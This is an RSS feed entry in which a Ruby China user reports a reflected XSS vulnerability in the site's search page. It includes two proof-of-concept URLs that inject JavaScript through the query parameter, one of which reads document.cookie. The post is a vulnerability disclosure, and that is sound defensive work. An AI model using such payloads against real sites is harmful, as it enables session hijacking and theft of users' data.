kevins1022 (ning1022) https://ruby-china.org/kevins1022 en-us 发现了个网站的反射 xss 漏洞,反馈下。 <p><a href="https://ruby-china.org/search?q=" rel="nofollow" target="_blank">https://ruby-china.org/search?q=</a>alert(String.fromCharCode(88, 83, 83))</p> <p><a href="https://ruby-china.org/search?q=" rel="nofollow" target="_blank">https://ruby-china.org/search?q=</a>alert(document.cookie)</p> <p><img src="https://l.ruby-china.com/photo/2016/45328bf5b379f0d07442393ce07a11b3.png" title="" alt=""></p> kevins1022 Sun, 03 Jul 2016 18:47:52 +0800 https://ruby-china.org/topics/30435 https://ruby-china.org/topics/30435